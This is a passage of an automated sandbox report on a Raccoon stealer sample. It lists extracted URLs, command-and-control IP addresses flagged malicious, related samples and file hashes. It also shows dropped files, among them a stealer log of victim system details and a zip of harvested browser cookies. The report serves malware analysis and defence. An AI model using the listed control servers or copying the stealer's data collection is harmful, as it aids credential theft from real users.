http://repository.swisssign.com/0	nssckbi.dll.0.dr	false		high
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	ldap60.dll.0.dr	false		high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadisglobal.com/cps0	nssckbi.dll.0.dr	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.0.dr	false		high
http://194.180.174.40/N#9	4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.0.dr	false		high
http://policy.camerfirma.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.0.dr	false		high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.0.dr	false		high
http://ocsp.accv.es0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	ldap60.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
https://www.google.c	4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
https://www.catcert.net/verarrel	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.0.dr	false		high
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://www.catcert.net/verarrel05	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.accv.es00	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.158.245.137	unknown	Moldova Republic of		39798	MIVOCLOUDMD	true
194.180.174.40	unknown	unknown		39798	MIVOCLOUDMD	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	533993
Start date:	04.12.2021
Start time:	22:28:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	4FGVZW19n7 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/67@0/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtProtectVirtualMemory calls found.
Errors:	Sigma runtime error: Invalid condition: all of selection* Rule: Conti Backup Database Sigma runtime error: Invalid condition: all of selection* Rule: Stop Or Remove Antivirus Service Sigma runtime error: Invalid condition: all of selection* Rule: Conti Volume Shadow Listing Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With 7-ZIP Sigma runtime error: Invalid condition: all of selection* Rule: Disable or Delete Windows Eventlog Sigma runtime error: Invalid condition: all of selection* Rule: PowerShell SAM Copy Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With WINZIP

Simulations

Behavior and APIs

Time	Type	Description
22:29:06	API Interceptor	4x Sleep call for process: 4FGVZW19n7.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.180.174.40	C7304FF0966068D305DA031F9DA60C5B0EBE32AC43533.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MIVOCLOUDMD	C7304FF0966068D305DA031F9DA60C5B0EBE32AC43533.exe	Get hash	malicious	Browse	194.180.174.40
	Excel.exe	Get hash	malicious	Browse	185.225.19.18
	XPCIJGAZa6.exe	Get hash	malicious	Browse	185.163.47.176
	qQJcbFPRA2.exe	Get hash	malicious	Browse	185.225.19.18
	OTYlygnSWX.exe	Get hash	malicious	Browse	185.225.19.18
	GjJT6ivmHE.exe	Get hash	malicious	Browse	185.225.19.18
	KXvto5PmPq.exe	Get hash	malicious	Browse	185.225.19.18
	rPPZ9xMp91.exe	Get hash	malicious	Browse	185.163.47.176
	heCg2WuRc5.exe	Get hash	malicious	Browse	185.225.19.18
	lnlJCR9JVn.exe	Get hash	malicious	Browse	185.225.19.18
	yPiIs9gm6C.exe	Get hash	malicious	Browse	185.225.19.18
	EOGcyVU7U3.exe	Get hash	malicious	Browse	185.225.19.18
	VF78jGjtCG.exe	Get hash	malicious	Browse	185.225.19.18
	1UiY4NbtpR.exe	Get hash	malicious	Browse	194.180.174.53
	gW5tyFvGjf.exe	Get hash	malicious	Browse	194.180.174.55
	6I49igNu9M.exe	Get hash	malicious	Browse	194.180.174.55
	rqXIlQODH4.exe	Get hash	malicious	Browse	194.180.174.55
	rqXIlQODH4.exe	Get hash	malicious	Browse	194.180.174.55
	qZOzPDjNcU.exe	Get hash	malicious	Browse	194.180.174.55
	OHYtYOxgVE.exe	Get hash	malicious	Browse	194.180.174.55
MIVOCLOUDMD	C7304FF0966068D305DA031F9DA60C5B0EBE32AC43533.exe	Get hash	malicious	Browse	194.180.174.40
	Excel.exe	Get hash	malicious	Browse	185.225.19.18
	XPCIJGAZa6.exe	Get hash	malicious	Browse	185.163.47.176
	qQJcbFPRA2.exe	Get hash	malicious	Browse	185.225.19.18
	OTYlygnSWX.exe	Get hash	malicious	Browse	185.225.19.18
	GjJT6ivmHE.exe	Get hash	malicious	Browse	185.225.19.18
	KXvto5PmPq.exe	Get hash	malicious	Browse	185.225.19.18
	rPPZ9xMp91.exe	Get hash	malicious	Browse	185.163.47.176
	heCg2WuRc5.exe	Get hash	malicious	Browse	185.225.19.18
	lnlJCR9JVn.exe	Get hash	malicious	Browse	185.225.19.18
	yPiIs9gm6C.exe	Get hash	malicious	Browse	185.225.19.18
	EOGcyVU7U3.exe	Get hash	malicious	Browse	185.225.19.18
	VF78jGjtCG.exe	Get hash	malicious	Browse	185.225.19.18
	1UiY4NbtpR.exe	Get hash	malicious	Browse	194.180.174.53
	gW5tyFvGjf.exe	Get hash	malicious	Browse	194.180.174.55
	6I49igNu9M.exe	Get hash	malicious	Browse	194.180.174.55
	rqXIlQODH4.exe	Get hash	malicious	Browse	194.180.174.55
	rqXIlQODH4.exe	Get hash	malicious	Browse	194.180.174.55
	qZOzPDjNcU.exe	Get hash	malicious	Browse	194.180.174.55
	OHYtYOxgVE.exe	Get hash	malicious	Browse	194.180.174.55

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll	Excel.exe	Get hash	malicious	Browse
	qQJcbFPRA2.exe	Get hash	malicious	Browse
	GjJT6ivmHE.exe	Get hash	malicious	Browse
	KXvto5PmPq.exe	Get hash	malicious	Browse
	heCg2WuRc5.exe	Get hash	malicious	Browse
	yPiIs9gm6C.exe	Get hash	malicious	Browse
	1UiY4NbtpR.exe	Get hash	malicious	Browse
	gW5tyFvGjf.exe	Get hash	malicious	Browse
	6I49igNu9M.exe	Get hash	malicious	Browse
	qZOzPDjNcU.exe	Get hash	malicious	Browse
	OHYtYOxgVE.exe	Get hash	malicious	Browse
	e9mndJTNXx.exe	Get hash	malicious	Browse
	2Nh7IQH6sn.exe	Get hash	malicious	Browse
	BJZd3H69V4.exe	Get hash	malicious	Browse
	odnNdH3N2Y.exe	Get hash	malicious	Browse
	gjYAgorDLm.exe	Get hash	malicious	Browse
	2axhkIPP4d.exe	Get hash	malicious	Browse
	VXCMYwN5ip.exe	Get hash	malicious	Browse
	6VMTIYMbWN.exe	Get hash	malicious	Browse
	loader.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\iE5-lV8m-M6 Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1083
Entropy (8bit):	5.275478938047536
Encrypted:	false
SSDEEP:	24:XZpgw2SCH/j3eSy53Net5INTBqhKQa7aCGik/R8RA2Tvqzh:pmSCL3i3Net0BgnCGik/R0A+0h
MD5:	9FFC90B2892E3BCB0AEA1ED3BD414B60
SHA1:	9F1BE2856238FAD83BB01AF2768B28DA995AD70A
SHA-256:	3DA0F68D20FDADDEB2C5364639D48F3BC9F5A127A4AF6A46F26DBF00F94E1F98
SHA-512:	527449602895A24F4CA6B2535FF0FF9BA6142A0D9F10703D0B776AEE12533CA1652D782C9598B5B793748834EBAB4F68892F9CA530837A6C7B1E4C448C70E6F5
Malicious:	false
Reputation:	low
Preview:	Raccoon \| 1.8.3-hotfix...Build compile date: Sun Nov 7 15:28:54 2021...Launched at: 2021.12.05 - 06:30:53 GMT......Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 84.17.52.65... - Location: 47.431702, 8.575900 \| Zurich, Zurich, Switzerland (8152)... - ComputerName: 992547... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5429 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....Upd

C:\Users\user\AppData\LocalLow\lmKlYaF5FRj.zip Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	1181
Entropy (8bit):	7.503414322843396
Encrypted:	false
SSDEEP:	24:9zqeqV+rt9ASnFfGHLCHVFB6+1WwKumgcWFjOPN:9zqL+r3zF2kLBVjON
MD5:	4139CBB66677C22A8C24B128FC39B405
SHA1:	7B186420F7E55F8BCD087D84301E686BF579F585
SHA-256:	A1400E2489CD9B41FD4209B346511C3F2EBA3FEB2E0ECD4222611C00CFB81C83
SHA-512:	605AE4109D84A82AD70F3FB8E3F4530C39A73A63C69E48A9BB9164DE2152A45E9B0D7915338D6629EACA44E65F456C32F9613826F10F3428D4B8C4EADD46C78E
Malicious:	false
Reputation:	low
Preview:	PK..........S_.Z.........*...browsers/cookies/Google Chrome_Default.txtUT.....a..a..a%..N.0...3&>.&......Q.n...B.ip.....O......e.gq..i.7N........9.[YL,.F.ug..L....G...l.....6:...#.2..%..g...\|....Ly7<'.......H......A....KI..I..e...-.$...Pf....se..@<....s.....M...).........PK..........Sn.......;.......System Info.txtUT.....a..a..auSMO.0.=...a..D,..$.mi..RT.... ...".#;.K..wB...D..y~.y.Y...._`$%Q...~9>.1muUBa......Q9lZ.W..`.L.<.E..r..K.b.J.M........M.."...5.;i..].r..d>K".&."..y6.3!N.8..X..4...+.p.5F.-`..J...[.......<...G.\|...V..g.J.h.-......o....u{.hk..G...r.N...~.5\|.......).......1..$.G/mq8..1.#6...R"."....u..\|\|7.yS.... e..>...m.....Y.E<.C7^9....v..mJ...I9....50J.OV.m..a.@f..\|.W.b..K....nrt.QU..a^N.....pH...'p.S8;.. ..r..U.'Kt.e..S.D.n.zU..M.2.{l...c<./..!...u%_.=.t.......R..z...Tz]\|.&...o....FV.6....M:.Ii..LP.^6.V.T.f....PlyNi$.........+.2A(.Y..`......8WU.R.#......K>IH..g..P.....S&mc{..p.e...~7.5l._..j.zm..8.,...4.....".Nu..Rw6.k.?PK......

C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
SSDEEP:	1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Excel.exe, Detection: malicious, Browse Filename: qQJcbFPRA2.exe, Detection: malicious, Browse Filename: GjJT6ivmHE.exe, Detection: malicious, Browse Filename: KXvto5PmPq.exe, Detection: malicious, Browse Filename: heCg2WuRc5.exe, Detection: malicious, Browse Filename: yPiIs9gm6C.exe, Detection: malicious, Browse Filename: 1UiY4NbtpR.exe, Detection: malicious, Browse Filename: gW5tyFvGjf.exe, Detection: malicious, Browse Filename: 6I49igNu9M.exe, Detection: malicious, Browse Filename: qZOzPDjNcU.exe, Detection: malicious, Browse Filename: OHYtYOxgVE.exe, Detection: malicious, Browse Filename: e9mndJTNXx.exe, Detection: malicious, Browse Filename: 2Nh7IQH6sn.exe, Detection: malicious, Browse Filename: BJZd3H69V4.exe, Detection: malicious, Browse Filename: odnNdH3N2Y.exe, Detection: malicious, Browse Filename: gjYAgorDLm.exe, Detection: malicious, Browse Filename: 2axhkIPP4d.exe, Detection: malicious, Browse Filename: VXCMYwN5ip.exe, Detection: malicious, Browse Filename: 6VMTIYMbWN.exe, Detection: malicious, Browse Filename: loader.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
SSDEEP:	384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
SSDEEP:	768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
